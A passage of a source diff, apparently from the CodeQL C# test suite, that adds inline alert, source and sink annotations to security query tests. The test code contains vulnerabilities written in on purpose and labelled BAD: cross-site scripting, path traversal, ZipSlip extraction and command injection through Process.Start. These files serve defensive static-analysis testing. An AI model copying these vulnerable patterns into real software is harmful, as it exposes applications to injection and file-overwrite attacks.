BuildRenderTree(global::Microsoft.AspNetCore.Components. __builder.AddContent(35, "Raw parameter from query string: "); __builder.AddContent(36, #nullable restore -new MarkupString(QueryParam) +new MarkupString(QueryParam) // $ Alert[cs/web/xss]=r2 $ Alert[cs/web/xss]=r2 #line default #line hidden diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs index a9d098470e44..344f5cbf6ac3 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Name.cs @@ -10,7 +10,7 @@ protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Renderin { builder.OpenElement(0, "div"); builder.OpenElement(1, "p"); - builder.AddContent(2, (MarkupString)TheName); + builder.AddContent(2, (MarkupString)TheName); // $ Alert[cs/web/xss]=r3 $ Alert[cs/web/xss]=r4 builder.CloseElement(); builder.CloseElement(); } @@ -19,4 +19,4 @@ protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Renderin [Parameter] public string TheName { get; set; } } -} \ No newline at end of file +} diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs index ceffb35303e5..31126310dff1 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList.cs @@ -28,7 +28,7 @@ protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Renderin builder.OpenElement(6, "p"); builder.AddContent(7, "Name: "); builder.OpenComponent(8); - builder.AddComponentParameter(9, nameof(VulnerableBlazorApp.Components.Name.TheName), Name); + builder.AddComponentParameter(9, nameof(VulnerableBlazorApp.Components.Name.TheName), Name); // $ Source[cs/web/xss]=r4 builder.CloseComponent(); builder.CloseElement(); } @@ -47,4 +47,4 @@ protected override void OnParametersSet() public List Names { get; set; } = new List(); } -} \ No newline at end of file +} diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList2.cs b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList2.cs index d27d6f2dcde9..fc6298943d3a 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList2.cs +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/NameList2.cs @@ -28,7 +28,7 @@ protected override void BuildRenderTree(Microsoft.AspNetCore.Components.Renderin builder.OpenElement(6, "p"); builder.AddContent(7, "Name: "); builder.OpenComponent(8); - builder.AddComponentParameter(9, "TheName", Name); + builder.AddComponentParameter(9, "TheName", Name); // $ Source[cs/web/xss]=r3 builder.CloseComponent(); builder.CloseElement(); } @@ -47,4 +47,4 @@ protected override void OnParametersSet() public List Names { get; set; } = new List(); } -} \ No newline at end of file +} diff --git a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref +++ b/csharp/ql/test/library-tests/frameworks/microsoft/aspnetcore/blazor/Xss.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref index b0835a02ad78..35d5389b7189 100644 --- a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref +++ b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWrite.qlref @@ -1 +1,2 @@ query: ASP/BlockCodeResponseWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWriteBad.aspx b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWriteBad.aspx index 1e4a0fffc015..ebf2cadc8b3f 100644 --- a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWriteBad.aspx +++ b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/BlockCodeResponseWriteBad.aspx @@ -2,6 +2,6 @@ -

    2 + 3 = <%Response.Write(2 + 3)%>

    +

    2 + 3 = <%Response.Write(2 + 3)%>

    <%-- $ Alert[cs/asp/response-write] --%> diff --git a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/test.aspx b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/test.aspx index 1e4a0fffc015..ebf2cadc8b3f 100644 --- a/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/test.aspx +++ b/csharp/ql/test/query-tests/ASP/BlockCodeResponseWrite/test.aspx @@ -2,6 +2,6 @@ -

    2 + 3 = <%Response.Write(2 + 3)%>

    +

    2 + 3 = <%Response.Write(2 + 3)%>

    <%-- $ Alert[cs/asp/response-write] --%> diff --git a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref index 90a69bb4a3b8..9a5bdd6c37e6 100644 --- a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref +++ b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCode.qlref @@ -1 +1,2 @@ query: ASP/ComplexInlineCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCodeBad.aspx b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCodeBad.aspx index f4457d89606f..b8e0a25ac2c8 100644 --- a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCodeBad.aspx +++ b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/ComplexInlineCodeBad.aspx @@ -15,6 +15,6 @@ } else { ec.Emit (Response, OpCodes.Ldloca, builder); } -%> +%> <%-- $ Alert[cs/asp/complex-inline-code] --%> diff --git a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/test.aspx b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/test.aspx index 1c2d09586ab5..39055702e35c 100644 --- a/csharp/ql/test/query-tests/ASP/ComplexInlineCode/test.aspx +++ b/csharp/ql/test/query-tests/ASP/ComplexInlineCode/test.aspx @@ -9,7 +9,7 @@ Response.write(3 + 2); } End If -%>

    +%>

    <%-- $ Alert[cs/asp/complex-inline-code] --%>

    2 + 3 = <%=2 + 3%>

    diff --git a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref index ac1b3e989b4c..0ca3c026d73e 100644 --- a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref +++ b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedText.qlref @@ -1 +1,2 @@ query: ASP/NonInternationalizedText.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedTextBad.aspx b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedTextBad.aspx index 2d5e7757d3af..935a9c19e0ef 100644 --- a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedTextBad.aspx +++ b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/NonInternationalizedTextBad.aspx @@ -2,6 +2,6 @@ -

    Amount: <%= Amount %>

    +

    Amount: <%= Amount %>

    <%-- $ Alert[cs/asp/text-not-internationalized] --%> diff --git a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/test.aspx b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/test.aspx index 44b6ab46947f..7027d6a07cb9 100644 --- a/csharp/ql/test/query-tests/ASP/NonInternationalizedText/test.aspx +++ b/csharp/ql/test/query-tests/ASP/NonInternationalizedText/test.aspx @@ -2,6 +2,6 @@ -

    This text is plain English.

    +

    This text is plain English.

    <%-- $ Alert[cs/asp/text-not-internationalized] --%> diff --git a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref index c02b4a97ae47..57c16f0abe63 100644 --- a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref +++ b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructure.qlref @@ -1 +1,2 @@ query: ASP/SplitControlStructure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructureBad.aspx b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructureBad.aspx index 4ef3f00f3bfc..870c3df8fd37 100644 --- a/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructureBad.aspx +++ b/csharp/ql/test/query-tests/ASP/SplitControlStructure/SplitControlStructureBad.aspx @@ -2,7 +2,7 @@ -<% If ShouldWarn() Then %> +<% If ShouldWarn() Then %> <%-- $ Alert[cs/asp/split-control-structure] --%>

    WARNING: <%=warning()%>

    <% End If %> diff --git a/csharp/ql/test/query-tests/ASP/SplitControlStructure/test.aspx b/csharp/ql/test/query-tests/ASP/SplitControlStructure/test.aspx index 8cd7245d0ca6..69d889b570a5 100644 --- a/csharp/ql/test/query-tests/ASP/SplitControlStructure/test.aspx +++ b/csharp/ql/test/query-tests/ASP/SplitControlStructure/test.aspx @@ -2,7 +2,7 @@ -<% If Something() Then %> +<% If Something() Then %> <%-- $ Alert[cs/asp/split-control-structure] --%>

    2 + 3 = <%=2 + 3%>

    <% End If %> diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref index 94937ccf811b..75899b3d5f2e 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref @@ -1 +1,2 @@ query: Configuration/EmptyPasswordInConfigurationFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref index 0479b5098f3d..9ae43388c25c 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref @@ -1 +1,2 @@ query: Configuration/PasswordInConfigurationFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/config.xml b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/config.xml index a72d5f8fa752..7a5f382236f8 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/config.xml +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/config.xml @@ -1,15 +1,15 @@ - - + + - - + + - - - - + + + + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref b/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref index f7d09f0bf5cd..f197b183e75e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref @@ -1 +1,2 @@ query: Security Features/CWE-011/ASPNetDebug.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-011/bad1/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-011/bad1/Web.config index ffc04c240fae..c79a46e2c881 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-011/bad1/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-011/bad1/Web.config @@ -4,6 +4,6 @@ + /> diff --git a/csharp/ql/test/query-tests/Security Features/CWE-011/bad2/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-011/bad2/Web.config index ffc04c240fae..c79a46e2c881 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-011/bad2/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-011/bad2/Web.config @@ -4,6 +4,6 @@ + /> diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref index a2914c126c3c..5c2fc1ad4f63 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref @@ -1 +1,2 @@ query: Security Features/CWE-016/ASPNetMaxRequestLength.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/bad/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/bad/Web.config index ea52bd2505b8..a9e98986c4cb 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/bad/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/bad/Web.config @@ -1,6 +1,6 @@ - + - \ No newline at end of file + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref index f2d275efd563..5eaf78b95be4 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref @@ -1 +1,2 @@ query: Security Features/CWE-016/ASPNetPagesValidateRequest.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequestBad.config b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequestBad.config index e8fbc48cb6e8..927a73b39d00 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequestBad.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequestBad.config @@ -1,5 +1,5 @@ - + - \ No newline at end of file + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref index e38b59c5c75a..c057ae5aa6c8 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref @@ -1 +1,2 @@ query: Security Features/CWE-016/ASPNetRequestValidationMode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationModeBad.config b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationModeBad.config index e2c8b8dc9031..2a9be99dc51e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationModeBad.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationModeBad.config @@ -1,5 +1,5 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedData.cs b/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedData.cs index 7b0f789c2aec..997ecc4f5cd2 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedData.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedData.cs @@ -6,11 +6,11 @@ public class UntrustedData : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - var name = ctx.Request.QueryString["name"]; + var name = ctx.Request.QueryString["name"]; // $ Alert[cs/untrusted-data-to-external-api]=r1 $ Alert[cs/untrusted-data-to-external-api]=r1 $ Source[cs/untrusted-data-to-external-api]=r2 var len = name.Length; var myEncodedString = HttpUtility.HtmlEncode(name); - ctx.Response.Write(name); + ctx.Response.Write(name); // $ Alert[cs/untrusted-data-to-external-api]=r2 } public bool IsReusable => true; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedDataToExternalAPI.qlref b/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedDataToExternalAPI.qlref index 22d3fe2ef63c..65b603105088 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedDataToExternalAPI.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/UntrustedDataToExternalAPI.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-020/UntrustedDataToExternalAPI.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.cs b/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.cs index 3ea90facfd3c..a22efa5e25fa 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.cs @@ -7,14 +7,14 @@ public class TaintedPathHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { - String path = ctx.Request.QueryString["page"]; + String path = ctx.Request.QueryString["page"]; // $ Source[cs/path-injection]=r1 $ Source[cs/path-injection]=r2 $ Source[cs/path-injection]=r3 $ Source[cs/path-injection]=r4 $ Source[cs/path-injection]=r5 $ Source[cs/path-injection]=r6 $ Source[cs/path-injection]=r7 // BAD: Used via a File.Create... call. - using (StreamWriter sw = File.CreateText(path)) + using (StreamWriter sw = File.CreateText(path)) // $ Alert[cs/path-injection]=r1 { sw.WriteLine("Hello"); } // BAD: Used via StreamWriter constructor - using (StreamWriter sw = new StreamWriter(path)) + using (StreamWriter sw = new StreamWriter(path)) // $ Alert[cs/path-injection]=r2 { sw.WriteLine("Hello"); } @@ -22,20 +22,20 @@ public void ProcessRequest(HttpContext ctx) // BAD: Check is insufficient, text is read. if (!path.StartsWith("../")) { - File.ReadAllText(path); + File.ReadAllText(path); // $ Alert[cs/path-injection]=r3 } // BAD: Check is insufficient, text is read. if (!string.IsNullOrEmpty(path)) { - File.ReadAllText(path); + File.ReadAllText(path); // $ Alert[cs/path-injection]=r4 } // BAD: Check is insufficient, text is read. string badPath = "/home/user/" + path; - if (File.Exists(badPath)) + if (File.Exists(badPath)) // $ Alert[cs/path-injection]=r5 { - ctx.Response.Write(File.ReadAllText(badPath)); + ctx.Response.Write(File.ReadAllText(badPath)); // $ Alert[cs/path-injection]=r6 } // GOOD: Tainted path is passed through MapPath @@ -48,7 +48,7 @@ public void ProcessRequest(HttpContext ctx) File.ReadAllText(path); } - Directory.Exists(path); + Directory.Exists(path); // $ Alert[cs/path-injection]=r7 // GOOD: A Guid. File.ReadAllText(new Guid(path).ToString()); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.qlref b/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.qlref index 10abc41286cf..9ab7666c8f1e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/TaintedPath/TaintedPath.qlref @@ -1,3 +1,5 @@ query: Security Features/CWE-022/TaintedPath.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.cs b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.cs index 1ec93bba3edd..189fb1a6eb6e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.cs @@ -12,15 +12,15 @@ public static void UnzipFileByFile(ZipArchive archive, { foreach (var entry in archive.Entries) { - string fullPath = Path.GetFullPath(entry.FullName); + string fullPath = Path.GetFullPath(entry.FullName); // $ Alert[cs/zipslip]=r1 $ Alert[cs/zipslip]=r2 $ Alert[cs/zipslip]=r3 string fileName = Path.GetFileName(entry.FullName); string filename = entry.Name; - string file = entry.FullName; + string file = entry.FullName; // $ Alert[cs/zipslip]=r4 if (!string.IsNullOrEmpty(file)) { // BAD string destFileName = Path.Combine(destDirectory, file); - entry.ExtractToFile(destFileName, true); + entry.ExtractToFile(destFileName, true); // $ Sink[cs/zipslip]=r4 // GOOD string sanitizedFileName = Path.Combine(destDirectory, fileName); @@ -28,15 +28,15 @@ public static void UnzipFileByFile(ZipArchive archive, // BAD string destFilePath = Path.Combine(destDirectory, fullPath); - entry.ExtractToFile(destFilePath, true); + entry.ExtractToFile(destFilePath, true); // $ Sink[cs/zipslip]=r1 // BAD: destFilePath isn't fully resolved, so may still contain .. if (destFilePath.StartsWith(destDirectory)) - entry.ExtractToFile(destFilePath, true); + entry.ExtractToFile(destFilePath, true); // $ Sink[cs/zipslip]=r2 // BAD destFilePath = Path.GetFullPath(Path.Combine(destDirectory, fullPath)); - entry.ExtractToFile(destFilePath, true); + entry.ExtractToFile(destFilePath, true); // $ Sink[cs/zipslip]=r3 // GOOD: a check for StartsWith against a fully resolved path if (destFilePath.StartsWith(destDirectory)) @@ -58,28 +58,28 @@ private static int UnzipToStream(Stream zipStream, string installDir) foreach (ZipArchiveEntry entry in archive.Entries) { // figure out where we are putting the file - String destFilePath = Path.Combine(InstallDir, entry.FullName); + String destFilePath = Path.Combine(InstallDir, entry.FullName); // $ Alert[cs/zipslip]=r5 $ Alert[cs/zipslip]=r6 $ Alert[cs/zipslip]=r7 $ Alert[cs/zipslip]=r8 Directory.CreateDirectory(Path.GetDirectoryName(destFilePath)); using (Stream archiveFileStream = entry.Open()) { // BAD: writing to file stream - using (Stream tfsFileStream = new FileStream(destFilePath, FileMode.CreateNew, FileAccess.ReadWrite, FileShare.None)) + using (Stream tfsFileStream = new FileStream(destFilePath, FileMode.CreateNew, FileAccess.ReadWrite, FileShare.None)) // $ Sink[cs/zipslip]=r5 { Console.WriteLine(@"Writing ""{0}""", destFilePath); archiveFileStream.CopyTo(tfsFileStream); } // BAD: can do it this way too - using (Stream tfsFileStream = File.Create(destFilePath)) + using (Stream tfsFileStream = File.Create(destFilePath)) // $ Sink[cs/zipslip]=r6 { Console.WriteLine(@"Writing ""{0}""", destFilePath); archiveFileStream.CopyTo(tfsFileStream); } // BAD: creating stream using fileInfo - var fileInfo = new FileInfo(destFilePath); + var fileInfo = new FileInfo(destFilePath); // $ Sink[cs/zipslip]=r7 using (FileStream fs = fileInfo.OpenWrite()) { Console.WriteLine(@"Writing ""{0}""", destFilePath); @@ -87,7 +87,7 @@ private static int UnzipToStream(Stream zipStream, string installDir) } // BAD: creating stream using fileInfo - var fileInfo1 = new FileInfo(destFilePath); + var fileInfo1 = new FileInfo(destFilePath); // $ Sink[cs/zipslip]=r8 using (FileStream fs = fileInfo1.Open(FileMode.Create)) { Console.WriteLine(@"Writing ""{0}""", destFilePath); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.qlref b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.qlref index f8a7ab34e883..9d8f3ad5a64b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlip.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-022/ZipSlip.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlipBad.cs b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlipBad.cs index fb6bce23b72f..5a996edbad86 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlipBad.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-022/ZipSlip/ZipSlipBad.cs @@ -6,7 +6,7 @@ class Bad public static void WriteToDirectory(ZipArchiveEntry entry, string destDirectory) { - string destFileName = Path.Combine(destDirectory, entry.FullName); - entry.ExtractToFile(destFileName); + string destFileName = Path.Combine(destDirectory, entry.FullName); // $ Alert[cs/zipslip]=r9 + entry.ExtractToFile(destFileName); // $ Sink[cs/zipslip]=r9 } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.cs index df3db94b4335..36ece73221e3 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.cs @@ -24,16 +24,16 @@ class CommandInjection public void WebCommandInjection() { // BAD: Reading from textbox, then using that in the arguments and file name - string userInput = categoryTextBox.Text; - Process.Start("foo.exe" + userInput, "/c " + userInput); + string userInput = categoryTextBox.Text; // $ Source[cs/command-line-injection]=r1 $ Source[cs/command-line-injection]=r2 $ Source[cs/command-line-injection]=r3 $ Source[cs/command-line-injection]=r4 $ Source[cs/command-line-injection]=r5 $ Source[cs/command-line-injection]=r6 $ Source[cs/command-line-injection]=r7 + Process.Start("foo.exe" + userInput, "/c " + userInput); // $ Alert[cs/command-line-injection]=r1 $ Alert[cs/command-line-injection]=r2 - ProcessStartInfo startInfo = new ProcessStartInfo(userInput, userInput); + ProcessStartInfo startInfo = new ProcessStartInfo(userInput, userInput); // $ Alert[cs/command-line-injection]=r3 $ Alert[cs/command-line-injection]=r4 Process.Start(startInfo); ProcessStartInfo startInfoProps = new ProcessStartInfo(); - startInfoProps.FileName = userInput; - startInfoProps.Arguments = userInput; - startInfoProps.WorkingDirectory = userInput; + startInfoProps.FileName = userInput; // $ Alert[cs/command-line-injection]=r5 + startInfoProps.Arguments = userInput; // $ Alert[cs/command-line-injection]=r6 + startInfoProps.WorkingDirectory = userInput; // $ Alert[cs/command-line-injection]=r7 Process.Start(startInfoProps); } @@ -43,12 +43,12 @@ public void StoredCommandInjection() { connection.Open(); SqlCommand customerCommand = new SqlCommand("SELECT * FROM customers", connection); - SqlDataReader customerReader = customerCommand.ExecuteReader(); + SqlDataReader customerReader = customerCommand.ExecuteReader(); // $ Source[cs/command-line-injection]=r8 while (customerReader.Read()) { // BAD: Read from database, and use it to directly execute a command - Process.Start("foo.exe", "/c " + customerReader.GetString(1)); + Process.Start("foo.exe", "/c " + customerReader.GetString(1)); // $ Alert[cs/command-line-injection]=r8 } customerReader.Close(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.qlref index 366f5105393f..607983370399 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-078/CommandInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-078/CommandInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.cs b/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.cs index 1096634b6903..1e30735d3265 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.cs @@ -14,12 +14,12 @@ public void processRequest(HttpContext context) { connection.Open(); SqlCommand customerCommand = new SqlCommand("SELECT * FROM customers", connection); - SqlDataReader customerReader = customerCommand.ExecuteReader(); + SqlDataReader customerReader = customerCommand.ExecuteReader(); // $ Source[cs/web/xss]=r1 while (customerReader.Read()) { // BAD: Read from database, write it straight to a response - 